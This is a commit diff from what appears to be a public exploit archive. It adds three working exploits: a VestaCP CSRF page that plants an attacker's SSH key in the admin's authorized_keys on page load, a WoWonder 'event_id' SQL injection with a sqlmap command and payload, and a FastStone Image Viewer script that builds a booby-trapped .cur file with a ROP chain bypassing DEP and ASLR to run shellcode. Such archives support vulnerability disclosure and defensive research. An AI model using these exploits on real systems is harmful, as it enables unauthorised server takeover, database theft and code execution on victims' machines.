DB: 2021-03-18

3 changes to exploits/shellcodes FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass) WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection VestaCP 0.9.8 - File Upload CSRF
2021-03-18 05:02:04 +00:00 · 2021-03-18 05:02:04 +00:00 · 2dc4594d19
commit 2dc4594d19
parent 3e6d011cf0
4 changed files with 256 additions and 0 deletions
--- a/exploits/multiple/webapps/49659.html
+++ b/exploits/multiple/webapps/49659.html
@ -0,0 +1,50 @@
+# Exploit Title: VestaCP 0.9.8 - File Upload CSRF
+# Exploit Author: Fady Othman 
+# Date: 16-03-2021
+# Vendor Homepage: https://vestacp.com/
+# Software Link: https://github.com/myvesta/vesta
+# Version: Vesta Control Panel (aka VestaCP) through 0.9.8-27 and myVesta through 0.9.8-26-39
+# CVE ID: CVE-2021-28379
+# Patch: https://github.com/myvesta/vesta/commit/3402071e950e76b79fa8672a1e09b70d3860f355
+
+## Description
+I found that the checks performed by the upload functionality are insufficient, the upload functionality is vulnerable to CSRF, in addition it allows uploading files and creating folders under "/tmp" and under the home folder (usually "/home/admin"), the later is the one that is important for this exploit to work.
+
+I was able to use this to create a ".ssh" folder in the admin home and upload "authorized_keys" file which allowed me to access the server later as "admin" using SSH.
+
+Since this relies on a *CSRF* the admin has to visit a link, please note that *sshd* is already installed by *VestaCP* when using the default installation script so no need to install it, also please note that files can be replaced so even if the admin has already added "authorized_keys" file, it will be replaced with the attacker's file.
+
+Affected endpoint: "/upload/index.php", i.e. "/upload/index.php?dir=/home/admin/.ssh/"
+
+## Steps to reproduce.
+1. Install the latest version of VestaCP in your machine by following the instructions at https://vestacp.com/install/.
+2. Login as the admin in Firefox, then open "exploit.html".
+3. ssh into the machine using 'ssh -i id_rsa admin@victimmachine', now you have access as admin.
+
+# exploit.html 
+
+<html>
+<head> 
+<script>
+
+function exploit() {
+	var mystring = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCnXyu8AsFjbuE5YMUa74PrNkO9coGWnw59v/cSVMgOZVpx+UziT0BRFurhVkyujTCXdz6OlN4yFZjCVMbAgZ7/liNu9ecGSGNcUTC+Br5YawlG9QICEaJ/bK32+luKdM1c5ONbRby+ARFsC9+iZu6IkAPnSRntbNgDZpuej/cKfm85EnvdQPAijvs4+899w2+rGvhSQ0wH4l1KNlV1yVoAsg0PFYGDnbygGA5Eo4k9LHwa2Hsm5b2Q5GhqlEUCgYFOjScuORczwhctVtp4VWKXiFoMLJupNhot/OqUXkoNgE6UUd75XcLNGMBiyfLpfXO2u1sGsw5nTiKvNn+1YdC7AKHWBjxl3wDY8hMf/gcveV4Nh45mMUu0p6kptDdVhELeeys8euHiTWOk+FLCKkps9eLiyl8gQUfWcFVj0dgqYVJne2S1U33wnofRhj0fGWAJf14xHhwnTi7u58u+0U1NJchOTHAaeX1Swqk2J34Ny9GwD01a71DFIIcIbgcef6c= fady@fady-Lenovo-Legion-Y530-15ICH-1060`;
+	var fileContent = new Blob([mystring], {
+    		type: 'text/plain'
+	});
+	myFormData = new FormData();
+	myFormData.append("files", fileContent, "authorized_keys");
+	fetch("https://localhost:8083/upload/index.php?dir=/home/admin/.ssh/", {
+    	method: "post",
+    	body: myFormData,
+    	credentials: "include"
+}); }
+</script>
+
+</head>
+
+<body onload="exploit();">
+
+
+</body>
+</html>
--- a/exploits/php/webapps/49657.txt
+++ b/exploits/php/webapps/49657.txt
@ -0,0 +1,27 @@
+# Exploit Title: WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection
+# Date: 16.03.2021
+# Exploit Author: securityforeveryone.com
+# Author Mail: hello[AT]securityforeveryone.com
+# Vendor Homepage: https://www.wowonder.com/
+# Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302
+# Version: < 3.1
+# Tested on: Linux/Windows
+
+DESCRIPTION
+
+In WoWonder < 3.1, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the event_id parameter.
+
+The vulnerability is found in the "event_id" parameter in GET request sent to page requests.php.
+Example:
+/requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID 
+
+if an attacker exploits this vulnerability, attacker may access private data in the database system.
+
+EXPLOITATION
+
+# GET /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID HTTP/1.1
+# Host: Target
+
+Sqlmap command: sqlmap -r request.txt --risk 3 --level 5 --random-agent -p event_id --dbs
+
+Payload: f=search-my-followers&s=normal&filter=s4e&event_id=1') AND 5376=5376-- QYxF
--- a/exploits/windows/local/49660.py
+++ b/exploits/windows/local/49660.py
@ -0,0 +1,176 @@
+# Exploit title: FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)
+# Exploit Author: Paolo Stagno
+# Date: 15/03/2020
+# Vendor Homepage: https://www.faststone.org/
+# Download: https://www.faststonesoft.net/DN/FSViewerSetup75.exe
+#                    https://github.com/VoidSec/Exploit-Development/tree/master/windows/x86/local/FastStone_Image_Viewer_v.7.5/
+# Version: 7.5
+# Tested on: Windows 10 Pro x64 v.1909 Build 18363.1256
+# Category: local exploit
+# Platform: windows
+
+# Module info :
+#----------------------------------------------------------------------------------------------------------------------
+#Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
+#----------------------------------------------------------------------------------------------------------------------
+#0x00400000 | 0x00abf000 | 0x006bf000 | False  | False   | False |  False   | False  | 7.5.0.0 [FSViewer.exe] (C:\Program Files (x86)\FastStone Image Viewer\FSViewer.exe)
+#0x6ad80000 | 0x6adfe000 | 0x0007e000 | False  | False   | False |  False   | False  | -1.0- [fsplugin05.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin05.dll)
+#0x6afb0000 | 0x6b011000 | 0x00061000 | True   | True    | False |  False   | False  | -1.0- [fsplugin06.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin06.dll)
+#----------------------------------------------------------------------------------------------------------------------
+
+#!/usr/bin/python
+import struct, sys
+print("\n[>] FastStone Image Viewer v. <= 7.5 Exploit by VoidSec\n")
+
+filename="FSViewer_v.7.5_exploit.cur"
+
+###################################################################################
+# Shellcode
+# MAX Shellcode size: 556
+# ImageData - ROP NOP - Rop Chain - Stack Adjustment = 776 - 144 - 68 - 8 = 556
+# Custom calc.exe shellcode
+# size: 112
+###################################################################################
+
+shellcode=(
+    "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
+    "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
+    "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
+    "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
+    "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
+    "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
+    "\x45\x81\x3e\x43\x72\x65\x61\x75"
+    "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
+    "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
+    "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
+    "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
+    "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
+    "\x6c\x63\x89\xe2\x52\x52\x53\x53"
+    "\x53\x53\x53\x53\x52\x53\xff\xd7"
+)
+
+
+if (len(shellcode)>556):
+    sys.exit("Shellcode's size must be <= 556 bytes")
+
+###################################################################################
+# Cur File Format
+# ---------------------------------------------------------------------------------
+# | Reserved | Type  | Image Count |
+# | 00 00    | 02 00 | 02 00       | <- CUR file will contains two images
+# Entries:
+# | Width | Height | ColorCount | Reserved | XHotSpot | YHotSpot | SizeInBytes | File Offset |
+# | 30    | 30     | 00         | 00       | 01 00    | 02 00    | 30 03 00 00 | 26 00 00 00 | <- we'll corrupt the first image with rop chain & shellcode 
+# | 20    | 20     | 00         | 00       | 02 00    | 04 00    | E8 02 00 00 | 56 03 00 00 | <- while leaving the 2nd one "untouched" a part from the stack pivot (should leave the cursor preview intact)
+# 1st Image Info Header:
+# | Size        | Width       | Height      | Planes | BitCount | Compression | ImageSize   | XpixelsPerM | YpixelsPerM | Colors Used | ColorsImportant |
+# | 28 00 00 00 | 30 00 00 00 | 60 00 00 00 | 01 00  | 89 30    | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00     |
+# 1st ImageData(BLOB)
+# 2nd Image Info Header:
+# 2nd ImageData(BLOB)
+# ---------------------------------------------------------------------------------
+# BitCount will be used to read # number of bytes into a buffer triggering the buffer overflow
+# its value can be modified but we need to account for two operations happening into the software.
+# - SHL 1, 89 = 0x200
+# - SHL 200, 2 = 0x800 (2048d) number of bytes to be read from the file
+# we'll have to pad the image data to match it's size in bytes defined in the header SizeInBytes
+# ImageData = SizeInBytes - ImageInfoHeader Size (330h-28h=308h 776d)
+###################################################################################
+
+image_data_pad = 776
+
+def create_rop_nop():
+    rop_gadgets = [
+        0x6adc5ab6, # 0x6adc5ab6 (RVA : 0x00045ab6) : # DEC ECX # RETN    ** [fsplugin05.dll] **   |   {PAGE_EXECUTE_READ}
+    ]
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+ 
+def create_rop_chain():
+    rop_gadgets = [
+        #[---INFO:gadgets_to_set_esi:---]
+        0x00405bd4,  # POP EAX ; RETN [FSViewer.exe] 
+        0x6adf4160,  # ptr to &VirtualProtect() [IAT fsplugin05.dll]
+        0x008b3977,  # MOV EAX,DWORD PTR DS:[EAX] ; RETN [FSViewer.exe] 
+        0x0083f67a,  # XCHG EAX,ESI ; RETN [FSViewer.exe] 
+        #[---INFO:gadgets_to_set_ebp:---]
+        0x005b35b8,  # POP EBP ; RETN [FSViewer.exe] 
+        0x00454521,  # & jmp esp [FSViewer.exe]
+        #[---INFO:gadgets_to_set_ebx:---]
+        0x00630472,  # POP EBX ; RETN [FSViewer.exe] 
+        0x00000201,  # 0x00000201-> ebx
+        #[---INFO:gadgets_to_set_edx:---]
+        0x004798db,  # POP EDX ; RETN [FSViewer.exe] 
+        0x00000040,  # 0x00000040-> edx
+        #[---INFO:gadgets_to_set_ecx:---]
+        0x004c7832,  # POP ECX ; RETN [FSViewer.exe] 
+        0x00991445,  # &Writable location [FSViewer.exe]
+        #[---INFO:gadgets_to_set_edi:---]
+        0x0040c3a8,  # POP EDI ; RETN [FSViewer.exe] 
+        0x0057660b,  # RETN (ROP NOP) [FSViewer.exe]
+        #[---INFO:gadgets_to_set_eax:---]
+        0x00404243,  # POP EAX ; RETN [FSViewer.exe] 
+        0x90909090,  # nop
+        #[---INFO:pushad:---]
+        0x6adc21bf,  # PUSHAD # RETN [fsplugin05.dll] 
+    ]
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+# Cur image = 1597 bytes
+###################################################################################
+cur_Signature = "\x00\x00\x02\x00\x02\x00" # | Reserved | Type  | Image Count |
+cur_Entries = (
+                "\x30\x30\x00\x00\x01\x00\x02\x00\x30\x03\x00\x00\x26\x00\x00\x00"  # 1st Entry
+                "\x20\x20\x00\x00\x02\x00\x04\x00\xE8\x02\x00\x00\x56\x03\x00\x00"  # 2nd Entry
+            )
+# 1st Image Info Header
+cur_1InfoHeader = "\x28\x00\x00\x00\x30\x00\x00\x00\x60\x00\x00\x00\x01\x00\x89\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+# 1st ImageData
+# cur_1ImageData_orig = "\x00\x00\x00\x00\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xC0\x00\x00\x00\x00\x00\x00\x08\x20\x00\x00\x00\x00\x00\x00\x08\x20\x00\x00\x00\x00\x00\x00\x10\x40\x00\x00\x00\x00\x00\x00\x10\x40\x00\x00\x00\x00\x00\x00\x20\x80\x00\x00\x00\x00\x00\x00\x20\x80\x00\x00\x00\x00\x00\x80\x41\x00\x1F\x80\x00\x00\x00\xC0\x41\x00\x3F\xC0\x00\x00\x00\xA0\x82\x00\x3F\xC0\x00\x00\x00\x90\x82\x00\x1F\x80\x00\x00\x00\x89\x04\x00\x00\x00\x00\x00\x00\x85\x04\x00\x1F\x80\x00\x00\x00\x82\x08\x00\x1F\x80\x00\x00\x00\x80\x0F\xFE\x1F\x80\x00\x00\x00\x80\x00\x04\x1F\x80\x00\x00\x00\x80\x00\x08\x0F\x80\x00\x00\x00\x80\x00\x10\x07\xC0\x00\x00\x00\x80\x00\x20\x03\xE0\x00\x00\x00\x80\x00\x47\xC1\xF0\x00\x00\x00\x80\x00\x87\xC1\xF8\x00\x00\x00\x80\x01\x07\xC1\xFC\x00\x00\x00\x80\x02\x07\xC1\xFC\x00\x00\x00\x80\x04\x07\xC1\xFC\x00\x00\x00\x80\x08\x07\xC1\xFC\x00\x00\x00\x80\x10\x07\xE3\xFC\x00\x00\x00\x80\x20\x03\xFF\xF8\x00\x00\x00\x80\x40\x01\xFF\xF0\x00\x00\x00\x80\x80\x00\xFF\xE0\x00\x00\x00\x81\x00\x00\x00\x00\x00\x00\x00\x82\x00\x00\x00\x00\x00\x00\x00\x84\x00\x00\x00\x00\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00\xA0\x00\x00\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xF8\x3F\xFF\xFF\xFF\x00\x00\xFF\xF0\x1F\xFF\xFF\xFF\x00\x00\xFF\xF0\x1F\xFF\xFF\xFF\x00\x00\xFF\xE0\x3F\xFF\xFF\xFF\x00\x00\xFF\xE0\x3F\xFF\xFF\xFF\x00\x00\xFF\xC0\x7F\xFF\xFF\xFF\x00\x00\xFF\xC0\x7F\xE0\x7F\xFF\x00\x00\x7F\x80\xFF\xC0\x3F\xFF\x00\x00\x3F\x80\xFF\x80\x1F\xFF\x00\x00\x1F\x01\xFF\x80\x1F\xFF\x00\x00\x0F\x01\xFF\xC0\x3F\xFF\x00\x00\x06\x03\xFF\xE0\x7F\xFF\x00\x00\x02\x03\xFF\xC0\x3F\xFF\x00\x00\x00\x07\xFF\xC0\x3F\xFF\x00\x00\x00\x00\x01\xC0\x3F\xFF\x00\x00\x00\x00\x03\xC0\x3F\xFF\x00\x00\x00\x00\x07\xE0\x3F\xFF\x00\x00\x00\x00\x0F\xF0\x1F\xFF\x00\x00\x00\x00\x10\x18\x0F\xFF\x00\x00\x00\x00\x30\x1C\x07\xFF\x00\x00\x00\x00\x70\x1C\x03\xFF\x00\x00\x00\x00\xF0\x1C\x01\xFF\x00\x00\x00\x01\xF0\x1C\x01\xFF\x00\x00\x00\x03\xF0\x1C\x01\xFF\x00\x00\x00\x07\xF0\x1C\x01\xFF\x00\x00\x00\x0F\xF0\x00\x01\xFF\x00\x00\x00\x1F\xF8\x00\x03\xFF\x00\x00\x00\x3F\xFC\x00\x07\xFF\x00\x00\x00\x7F\xFE\x00\x0F\xFF\x00\x00\x00\xFF\xFF\x00\x1F\xFF\x00\x00\x01\xFF\xFF\xFF\xFF\xFF\x00\x00\x03\xFF\xFF\xFF\xFF\xFF\x00\x00\x07\xFF\xFF\xFF\xFF\xFF\x00\x00\x0F\xFF\xFF\xFF\xFF\xFF\x00\x00\x1F\xFF\xFF\xFF\xFF\xFF\x00\x00\x3F\xFF\xFF\xFF\xFF\xFF\x00\x00\x7F\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00"
+print("Generating 1st ImageData BLOB:")
+cur_1ImageData = ""
+cur_1ImageData += create_rop_nop() * ( (1560 - 1416 ) / 4 ) # 1560 stack pivot - 1416 where our cyclic pattern has been found
+print("- ROP NOP:\t\t{}".format(len(cur_1ImageData)))
+cur_1ImageData += create_rop_chain()
+print("- ROP Chain:\t\t{}".format(len(create_rop_chain())))
+cur_1ImageData += "\x81\xC4\x44\xFD\xFF\xFF\x90\x90"               # stack adjustment for meterpreter GetPC routine: add esp, -700
+print("- Stack Adjustment:\t8")
+cur_1ImageData += shellcode
+print("- Shellcode:\t\t{}".format(len(shellcode)))
+cur_1ImageData += "A" * (image_data_pad - len(cur_1ImageData))
+# 2nd Image Info Header
+cur_2InfoHeader = "\x28\x00\x00\x00\x20\x00\x00\x00\x40\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+# 2nd ImageData (if this does not trigger the stack pivot it should be changed removing the beginning \x00 byte of cur_2ImageData2 and adding it back at the end of cur_2ImageData section)
+cur_2ImageData = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80\x00\x80\x00\x80\x80\x00\x00\xC0\xC0\xC0\x00\x80\x80\x80\x00\x00\x00\xFF\x00\x00\xFF\x00\x00\x00\xFF\xFF\x00\xFF\x00\x00\x00\xFF\x00\xFF\x00\xFF\xFF\x00\x00\xFF\xFF\xFF\x00\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x1F\xFF\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\x00\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\x00\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x1F\x00\x0F\x11\x11\x11\x10\x00\x11\x11\x11\x11\x11\x11\x11\x11\x1F\x00\x0F\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF1\x11\x11\xF0\x00\xF1\x11\x11\x10\xFF\xFF\xF0\x11\x11\x11\x11\xFF\x11\x11\xF0\x00\xF1\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\xF1\x1F\x00\x0F\x11\x11\x11\x11\x10\x00\x11\x11\x11\x11\x11\xF0\x0F\x1F\x00\x0F\x11\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\x00\xF0\x00\xF1\x11\x11\x11\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\x00\x00\x00\xFF\xFF\xFF\xF1\x11\x0F\xFF\x01\x11\x11\x11\x11\xF0\x00\x00\x00\x00\x00\x0F\x11\x11\x10\xFF\xF0\x11\x11\x11\x11\xF0\x00\x00\x00\x00\x00\xF1\x00\x00\x01\x0F\xFF\x01\x11\x11\x11\xF0\x00\x00\x00\x00\x0F\x11\x0F\xFF\x01\x10\xFF\xF0\x11\x11\x11\xF0\x00\x00\x00\x00\xF1\x11\x0F\xFF\x01\x10\xFF\xFF\x01\x11\x11\xF0\x00\x00\x00\x0F\x11\x11\x0F\xFF\x01\x10\xFF\xFF\x01\x11\x11\xF0\x00\x00\x00\xF1\x11\x11\x0F\xFF\x01\x10\xFF\xFF\x01\x11\x11\xF0\x00\x00"
+# SEH record overwrite goes here
+cur_2ImageData2 = "\x00\xFF\xF0\x0F\xFF\xF0\x11\x11\x11\xF0\x00\x00\xF1\x11\x11\x11\x11\x0F\xFF\xFF\xFF\x01\x11\x11\x11\xF0\x00\x0F\x11\x11\x11\x11\x11\x10\x00\x00\x00\x11\x11\x11\x11\xF0\x00\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\x0F\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF0\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xFF\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xF1\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xE3\xFF\xFF\xFF\xC1\xFF\xFF\xFF\xC1\xFF\xFF\xFF\x83\xF8\xFF\xFF\x83\xF0\x7F\xDF\x07\xE0\x3F\xCF\x07\xF0\x7F\xC6\x0F\xF8\xFF\xC2\x0F\xF0\x7F\xC0\x1F\xF0\x7F\xC0\x00\x70\x7F\xC0\x00\xF8\x3F\xC0\x01\x04\x1F\xC0\x03\x06\x0F\xC0\x07\x06\x07\xC0\x0F\x06\x07\xC0\x1F\x06\x07\xC0\x3F\x80\x0F\xC0\x7F\xC0\x1F\xC0\xFF\xE0\x3F\xC1\xFF\xFF\xFF\xC3\xFF\xFF\xFF\xC7\xFF\xFF\xFF\xCF\xFF\xFF\xFF\xDF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
+###################################################################################
+
+buf = ""
+buf += cur_Signature
+buf += cur_Entries
+buf += cur_1InfoHeader
+buf += cur_1ImageData
+buf += cur_2InfoHeader
+buf += cur_2ImageData
+# buf += struct.pack('<I',0x004023da) # SEH pop ecx ; pop ebp ; ret  | startnull {PAGE_EXECUTE_READ} [FSViewer.exe]
+# 0x0019dc10 : Pointer into normal cyclic pattern at ESP+0x588 (+1416) : 0x0019dc48 : offset 1, length 775
+buf += struct.pack('<I',0x6adad2ff) # stack pivot 1560 / 0x618 :  ADD ESP,608 ; POP EBX ; POP ESI ; POP EDI ; POP EBP ; RETN    ** [fsplugin05.dll] **   |   {PAGE_EXECUTE_READ}
+buf += cur_2ImageData2
+
+#buf += "B" * (buf_max_size - len(buf))
+print("\nWriting CUR File:")
+print("--------------------------------------------------------")
+print("- Signature + ImageCount:\t{}".format(len(cur_Signature)))
+print("- Entries 2/2:\t\t\t{}".format(len(cur_Entries)))
+print("- 1st InfoHeader:\t\t{}".format(len(cur_1InfoHeader)))
+print("- 1st ImageData:\t\t{}".format(len(cur_1ImageData)))
+print("- 2nd InfoHeader:\t\t{}".format(len(cur_2InfoHeader)))
+print("  2nd ImageData 1/2:\t{}".format(len(cur_2ImageData)))
+print("  SEH:\t\t\t4")
+print("  2nd ImageData 2/2:\t{}".format(len(cur_2ImageData2)))
+print("- 2nd ImageData TOT:\t\t{}".format(len(cur_2ImageData)+4+len(cur_2ImageData2)))
+print("--------------------------------------------------------")
+print("[+] Writing total {} bytes on {}".format(len(buf), filename))
+file = open(filename, "w");
+file.write(buf);
+file.close();
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11290,6 +11290,7 @@ id,file,description,date,author,type,platform,port
 49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
 49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
 49656,exploits/android/local/49656.py,"GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,android,
+49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",2021-03-17,"Paolo Stagno",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43842,3 +43843,5 @@ id,file,description,date,author,type,platform,port
 49650,exploits/multiple/webapps/49650.py,"Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure",2021-03-15,"Berkan Er",webapps,multiple,
 49651,exploits/multiple/webapps/49651.rb,"SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-15,"Berkan Er",webapps,multiple,
 49652,exploits/php/webapps/49652.py,"Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)",2021-03-16,"Christian Vierschilling",webapps,php,
+49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php,
+49659,exploits/multiple/webapps/49659.html,"VestaCP 0.9.8 - File Upload CSRF",2021-03-17,"Fady Mohammed Osman",webapps,multiple,